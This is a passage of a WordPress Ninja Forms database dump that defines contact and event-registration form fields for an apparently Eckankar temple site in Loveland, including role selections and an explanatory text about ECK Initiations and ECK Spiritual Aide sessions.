class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:27:\"Spiritual Services Director\";s:5:\"value\";s:27:\"Spiritual Services Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:23:\"Administrative Services\";s:5:\"value\";s:23:\"Administrative Services\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:5:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:19:\"ECK Temple Director\";s:5:\"value\";s:19:\"eck-temple-director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:24:\"ECK Temple Vahana Leader\";s:5:\"value\";s:24:\"ECK Temple Vahana Leader\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:27:\"Spiritual Services Director\";s:5:\"value\";s:27:\"Spiritual Services Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:23:\"Administrative Services\";s:5:\"value\";s:23:\"Administrative Services\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(12348,384,'key','listselect_28','key','listselect_28'),(12349,384,'container_class','','container_class',''),(12350,384,'parent_id','8','parent_id','8'),(12351,384,'drawerDisabled','','drawerDisabled',''),(12352,384,'idAttribute','id','idAttribute','id'),(12353,384,'field_label','Select the person you would like to email','field_label','Select the person you would like to email'),(12354,384,'field_key','listselect_28','field_key','listselect_28'),(12355,385,'objectType','Field','objectType','Field'),(12356,385,'objectDomain','fields','objectDomain','fields'),(12357,385,'editActive','','editActive',''),(12358,385,'order','9','order','9'),(12359,385,'type','textarea','type','textarea'),(12360,385,'label','Enter Your Message Here','label','Enter Your Message Here'),(12361,385,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(12362,385,'label_pos','above','label_pos','above'),(12363,385,'default_value','','default_value',''),(12364,385,'textarea_rte','0','textarea_rte','0'),(12365,385,'textarea_media','0','textarea_media','0'),(12366,385,'disable_rte_mobile','0','disable_rte_mobile','0'),(12367,385,'input_limit','','input_limit',''),(12368,385,'input_limit_type','char','input_limit_type','char'),(12369,385,'calc_auto_include','0','calc_auto_include','0'),(12370,385,'num_sort','0','num_sort','0'),(12371,385,'admin_label','','admin_label',''),(12372,385,'show_help','0','show_help','0'),(12373,385,'help_text','','help_text',''),(12374,385,'show_desc','0','show_desc','0'),(12375,385,'desc_pos','none','desc_pos','none'),(12376,385,'desc_text','','desc_text',''),(12377,385,'element_class','','element_class',''),(12378,385,'required','1','required','1'),(12379,385,'default','','default',''),(12380,385,'key','textarea_29','key','textarea_29'),(12381,385,'placeholder','','placeholder',''),(12382,385,'container_class','','container_class',''),(12383,385,'manual_key','','manual_key',''),(12384,385,'parent_id','8','parent_id','8'),(12385,385,'idAttribute','id','idAttribute','id'),(12386,385,'field_label','Enter Your Message Here','field_label','Enter Your Message Here'),(12387,385,'field_key','textarea_29','field_key','textarea_29'),(12388,385,'value','','value',''),(17969,659,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Loveland Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Loveland Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.'),(17968,659,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(17967,659,'label','Text','label','Text'),(17966,659,'type','html','type','html'),(17964,659,'editActive','','editActive',''),(17965,659,'order','1','order','1'),(17963,659,'objectDomain','fields','objectDomain','fields'),(12409,387,'objectType','Field','objectType','Field'),(12410,387,'objectDomain','fields','objectDomain','fields'),(12411,387,'editActive','','editActive',''),(12412,387,'order','11','order','11'),(12413,387,'type','submit','type','submit'),(12414,387,'label','Submit','label','Submit'),(12415,387,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(12416,387,'show_help','0','show_help','0'),(12417,387,'help_text','','help_text',''),(12418,387,'show_desc','0','show_desc','0'),(12419,387,'desc_pos','none','desc_pos','none'),(12420,387,'desc_text','','desc_text',''),(12421,387,'processing_label','Processing','processing_label','Processing'),(12422,387,'element_class','','element_class',''),(12423,387,'key','submit_31','key','submit_31'),(12424,387,'container_class','','container_class',''),(12425,387,'parent_id','8','parent_id','8'),(12426,387,'idAttribute','id','idAttribute','id'),(12427,387,'field_label','Submit','field_label','Submit'),(12428,387,'field_key','submit_31','field_key','submit_31'),(12442,388,'objectType','Field','objectType','Field'),(12443,388,'objectDomain','fields','objectDomain','fields'),(12444,388,'editActive','','editActive',''),(12445,388,'order','1','order','1'),(12446,388,'idAttribute','id','idAttribute','id'),(12447,388,'label','Register For This Event','label','Register For This Event'),(12448,388,'key','register_for_this_event_1614289627888','key','register_for_this_event_1614289627888'),(12449,388,'type','html','type','html'),(12450,388,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(12451,388,'default','<p>After registration, you will receive event login information via email.</p>','default','<p>After registration, you will receive event login information via email.</p>'),(12679,258,'idAttribute','id','idAttribute','id'),(12680,259,'idAttribute','id','idAttribute','id'),(12452,388,'container_class','','container_class',''),(12453,388,'element_class','','element_class',''),(12454,388,'field_label','Test Event--SOS Registration','field_label','Test Event--SOS Registration'),(12455,388,'field_key','test_event--sos_registration_1613771013138','field_key','test_event--sos_registration_1613771013138'),(12456,388,'drawerDisabled','','drawerDisabled',''),(12457,388,'parent_id','42','parent_id','42'),(12458,389,'objectType','Field','objectType','Field'),(12459,389,'objectDomain','fields','objectDomain','fields'),(12460,389,'editActive','','editActive',''),(12461,389,'order','2','order','2'),(12462,389,'idAttribute','id','idAttribute','id'),(12463,389,'label','Divider','label','Divider'),(12464,389,'key','hr','key','hr'),(12465,389,'type','hr','type','hr'),(12466,389,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(12467,389,'container_class','','container_class',''),(12468,389,'element_class','','element_class',''),(12469,389,'field_label','Divider','field_label','Divider'),(12470,389,'field_key','hr','field_key','hr'),(12471,389,'parent_id','42','parent_id','42'),(12472,390,'objectType','Field','objectType','Field'),(12473,390,'objectDomain','fields','objectDomain','fields'),(12474,390,'editActive','','editActive',''),(12475,390,'order','3','order','3'),(12476,390,'idAttribute','id','idAttribute','id'),(12477,390,'label','First Name','label','First Name'),(12478,390,'key','firstname','key','firstname'),(12479,390,'type','firstname','type','firstname'),(12480,390,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(12481,390,'label_pos','default','label_pos','default'),(12482,390,'required','1','required','1'),(12483,390,'default','','default',''),(12484,390,'placeholder','','placeholder',''),(12485,390,'container_class','','container_class',''),(12486,390,'element_class','','element_class',''),(12487,390,'admin_label','','admin_label',''),(12488,390,'help_text','','help_text',''),(12489,390,'desc_text','','desc_text',''),(12490,390,'field_label','First Name','field_label','First Name'),(12491,390,'field_key','firstname','field_key','firstname'),(12492,390,'custom_name_attribute','fname','custom_name_attribute','fname'),(12493,390,'personally_identifiable','1','personally_identifiable','1'),(12494,390,'value','','value',''),(12495,390,'parent_id','42','parent_id','42'),(12496,391,'objectType','Field','objectType','Field'),(12497,391,'objectDomain','fields','objectDomain','fields'),(12498,391,'editActive','','editActive',''),(12499,391,'order','4','order','4'),(12500,391,'idAttribute','id','idAttribute','id'),(12501,391,'label','Last Name','label','Last Name'),(12502,391,'key','lastname','key','lastname'),(12503,391,'type','lastname','type','lastname'),(12504,391,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(12505,391,'label_pos','default','label_pos','default'),(12506,391,'required','1','required','1'),(12507,391,'default','','default',''),(12508,391,'placeholder','','placeholder',''),(12509,391,'container_class','','container_class',''),(12510,391,'element_class','','element_class',''),(12511,391,'admin_label','','admin_label',''),(12512,391,'help_text','','help_text',''),(12513,391,'desc_text','','desc_text',''),(12514,391,'field_label','Last Name','field_label','Last Name'),(12515,391,'field_key','lastname','field_key','lastname'),(12516,391,'custom_name_attribute','lname','custom_name_attribute','lname'),(12517,391,'personally_identifiable','1','personally_identifiable','1'),(12518,391,'value','','value',''),(12519,391,'drawerDisabled','','drawerDisabled',''),(12520,391,'parent_id','42','parent_id','42'),(12521,392,'objectType','Field','objectType','Field'),(12522,392,'objectDomain','fields','objectDomain','fields'),(12523,392,'editActive','','editActive',''),(12524,392,'order','5','order','5'),(12525,392,'idAttribute','id','idAttribute','id'),(12526,392,'label','Email','label','Email'),(12527,392,'key','email','key','email'),(12528,392,'type','email','type','email'),(12529,392,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(12530,392,'label_pos','default','label_pos','default'),(12531,392,'required','1','required','1'),(12532,392,'default','','default',''),(12533,392,'placeholder','','placeholder',''),(12534,392,'container_class','one-half first','container_class','one-half first'),(12535,392,'element_class','','element_class',''),(12536,392,'admin_label','','admin_label',''),(12537,392,'help_text','','help_text',''),(12538,392,'desc_text','','desc_text',''),(12539,392,'field_label','Email','field_label','Email'),(12540,392,'field_key','email','field_key','email'),(12541,392,'custom_name_attribute','email','custom_name_attribute','email'),(12542,392,'personally_identifiable','1','personally_identifiable','1'),(12543,392,'value','','value',''),(12544,392,'parent_id','42','parent_id','42'),(12545,393,'objectType','Field','objectType','Field'),(12546,393,'objectDomain','fields','objectDomain','fields'),(12547,393,'editActive','','editActive',''),(12548,393,'order','13','order','13'),(12549,393,'idAttribute','id','idAttribute','id'),(12550,393,'label','Register','label','Register'),(12551,393,'key','register','key','register'),(12552,393,'type','submit','type','submit'),(12553,393,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(12554,393,'processing_label','Processing','processing_label','Processing'),(12555,393,'container_class','','container_class',''),(12556,393,'element_class','','element_class',''),(12557,393,'field_label','Register','field_label','Register'),(12558,393,'field_key','register','field_key','register'),(12559,393,'parent_id','42','parent_id','42'),(13180,413,'key','your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662','key','your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662'),(13179,413,'element_class','','element_class',''),(13178,413,'container_class','','container_class',''),(13336,402,'drawerDisabled','','drawerDisabled',''),(13172,413,'editActive','','editActive',''),(13173,413,'order','8','order','8'),(13174,413,'idAttribute','id','idAttribute','id'),(13175,413,'label','','label',''),(13176,413,'type','html','type','html'),(13177,413,'default','<p>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.<br></p>','default','<p>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.<br></p>'),(13193,228,'drawerDisabled','','drawerDisabled',''),(13192,232,'idAttribute','id','idAttribute','id'),(17471,621,'default','This site is protected by reCAPTCHA and the Google\n    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and\n    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','default','This site is protected by reCAPTCHA and the Google\n    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and\n    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.'),(13187,227,'idAttribute','id','idAttribute','id'),(13189,229,'idAttribute','id','idAttribute','id'),(13190,230,'idAttribute','id','idAttribute','id'),(13337,352,'idAttribute','id','idAttribute','id'),(13338,353,'idAttribute','id','idAttribute','id'),(13339,354,'idAttribute','id','idAttribute','id'),(13340,355,'idAttribute','id','idAttribute','id'),(13341,356,'idAttribute','id','idAttribute','id'),(13342,357,'idAttribute','id','idAttribute','id'),(13343,358,'idAttribute','id','idAttribute','id'),(13344,359,'idAttribute','id','idAttribute','id'),(17381,612,'idAttribute','id','idAttribute','id'),(13346,361,'idAttribute','id','idAttribute','id'),(13106,405,'drawerDisabled','','drawerDisabled',''),(13188,228,'idAttribute','id','idAttribute','id'),(13186,226,'drawerDisabled','','drawerDisabled',''),(13185,226,'idAttribute','id','idAttribute','id'),(13182,223,'idAttribute','id','idAttribute','id'),(13183,224,'idAttribute','id','idAttribute','id'),(13184,225,'idAttribute','id','idAttribute','id'),(13181,413,'drawerDisabled','','drawerDisabled',''),(13076,304,'drawerDisabled','','drawerDisabled',''),(12678,257,'idAttribute','id','idAttribute','id'),(12681,260,'idAttribute','id','idAttribute','id'),(12682,261,'idAttribute','id','idAttribute','id'),(12683,261,'drawerDisabled','','drawerDisabled',''),(12684,262,'idAttribute','id','idAttribute','id'),(12685,263,'idAttribute','id','idAttribute','id'),(12686,264,'idAttribute','id','idAttribute','id'),(12687,265,'idAttribute','id','idAttribute','id'),(12688,266,'idAttribute','id','idAttribute','id'),(12689,267,'idAttribute','id','idAttribute','id'),(12690,268,'idAttribute','id','idAttribute','id'),(12691,269,'idAttribute','id','idAttribute','id'),(12692,270,'idAttribute','id','idAttribute','id'),(12693,271,'idAttribute','id','idAttribute','id'),(12694,272,'idAttribute','id','idAttribute','id'),(17371,611,'idAttribute','id','idAttribute','id'),(12696,274,'idAttribute','id','idAttribute','id'),(12697,262,'drawerDisabled','','drawerDisabled',''),(12698,266,'drawerDisabled','','drawerDisabled',''),(12699,267,'drawerDisabled','','drawerDisabled',''),(12700,270,'drawerDisabled','','drawerDisabled',''),(12701,269,'drawerDisabled','','drawerDisabled',''),(12702,78,'idAttribute','id','idAttribute','id'),(12703,79,'idAttribute','id','idAttribute','id'),(12704,80,'idAttribute','id','idAttribute','id'),(12705,81,'idAttribute','id','idAttribute','id'),(12706,82,'idAttribute','id','idAttribute','id'),(12707,82,'drawerDisabled','','drawerDisabled',''),(12708,83,'idAttribute','id','idAttribute','id'),(12709,84,'idAttribute','id','idAttribute','id'),(12710,85,'idAttribute','id','idAttribute','id'),(12711,86,'idAttribute','id','idAttribute','id'),(12712,87,'idAttribute','id','idAttribute','id'),(12713,88,'idAttribute','id','idAttribute','id'),(12714,89,'idAttribute','id','idAttribute','id'),(12715,90,'idAttribute','id','idAttribute','id'),(12716,91,'idAttribute','id','idAttribute','id'),(12717,92,'idAttribute','id','idAttribute','id'),(12718,93,'idAttribute','id','idAttribute','id'),(17563,630,'key','html_1663800517759','key','html_1663800517759'),(12720,95,'idAttribute','id','idAttribute','id'),(12721,83,'drawerDisabled','','drawerDisabled',''),(12722,5,'idAttribute','id','idAttribute','id'),(12723,6,'idAttribute','id','idAttribute','id'),(12724,7,'idAttribute','id','idAttribute','id'),(12725,8,'idAttribute','id','idAttribute','id'),(12726,9,'idAttribute','id','idAttribute','id'),(12727,10,'idAttribute','id','idAttribute','id'),(12728,13,'idAttribute','id','idAttribute','id'),(12729,14,'idAttribute','id','idAttribute','id'),(12731,16,'idAttribute','id','idAttribute','id'),(12732,42,'idAttribute','id','idAttribute','id'),(12733,43,'idAttribute','id','idAttribute','id'),(12734,44,'idAttribute','id','idAttribute','id'),(12735,45,'idAttribute','id','idAttribute','id'),(12736,46,'idAttribute','id','idAttribute','id'),(12737,47,'idAttribute','id','idAttribute','id'),(12738,50,'idAttribute','id','idAttribute','id'),(12739,51,'idAttribute','id','idAttribute','id'),(17028,599,'editActive','','editActive',''),(12741,53,'idAttribute','id','idAttribute','id'),(12742,54,'idAttribute','id','idAttribute','id'),(12743,55,'idAttribute','id','idAttribute','id'),(12744,56,'idAttribute','id','idAttribute','id'),(12745,57,'idAttribute','id','idAttribute','id'),(12746,58,'idAttribute','id','idAttribute','id'),(12747,59,'idAttribute','id','idAttribute','id'),(12748,62,'idAttribute','id','idAttribute','id'),(12749,63,'idAttribute','id','idAttribute','id'),(12751,65,'idAttribute','id','idAttribute','id'),(12752,285,'idAttribute','id','idAttribute','id'),(12753,286,'idAttribute','id','idAttribute','id'),(12754,287,'idAttribute','id','idAttribute','id'),(12755,288,'idAttribute','id','idAttribute','id'),(12756,289,'idAttribute','id','idAttribute','id'),(12757,290,'idAttribute','id','idAttribute','id'),(12758,293,'idAttribute','id','idAttribute','id'),(12759,294,'idAttribute','id','idAttribute','id'),(12761,296,'idAttribute','id','idAttribute','id'),(12762,96,'idAttribute','id','idAttribute','id'),(12763,97,'idAttribute','id','idAttribute','id'),(12764,98,'idAttribute','id','idAttribute','id'),(12765,99,'idAttribute','id','idAttribute','id'),(12766,100,'idAttribute','id','idAttribute','id'),(12767,101,'idAttribute','id','idAttribute','id'),(12768,102,'idAttribute','id','idAttribute','id'),(12769,103,'idAttribute','id','idAttribute','id'),(12770,104,'idAttribute','id','idAttribute','id'),(12771,105,'idAttribute','id','idAttribute','id'),(17552,629,'element_class','','element_class',''),(12773,107,'